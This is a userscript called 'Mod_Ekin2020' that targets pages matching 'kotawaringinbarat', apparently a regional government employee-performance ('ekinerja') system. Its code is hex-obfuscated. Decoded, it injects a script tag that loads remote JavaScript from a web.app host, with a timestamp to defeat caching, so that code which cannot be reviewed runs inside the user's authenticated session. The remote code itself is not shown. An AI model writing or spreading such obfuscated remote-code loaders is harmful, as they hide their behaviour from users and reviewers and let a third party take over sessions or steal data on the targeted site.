// ==UserScript==
// @name        Mod_Ekin2020
// @namespace   svm
// @author      hendrik svm
// @include     *kotawaringinbarat*
// @grant       GM_addStyle
// ==/UserScript==

(function () {
    'use strict';
    var _0x7990=["\x67\x65\x74\x54\x69\x6D\x65","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x62\x6F\x64\x79","\x71\x75\x65\x72\x79\x53\x65\x6C\x65\x63\x74\x6F\x72","\x73\x72\x63","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x68\x65\x6E\x64\x72\x69\x6B\x2D\x73\x76\x6D\x2E\x77\x65\x62\x2E\x61\x70\x70\x2F\x65\x6B\x69\x6E\x65\x72\x6A\x61\x2F\x61\x73\x73\x65\x74\x73\x2F\x6A\x73\x2F\x73\x74\x61\x72\x74\x65\x72\x2E\x6A\x73\x3F\x74\x3D","\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];
    let timestamp= new Date()[_0x7990[0]]();
    const script=document[_0x7990[2]](_0x7990[1]);
    const svm_script=document[_0x7990[4]](_0x7990[3]);
    script[_0x7990[7]](_0x7990[5],_0x7990[6]+ timestamp);svm_script[_0x7990[8]](script)
})();
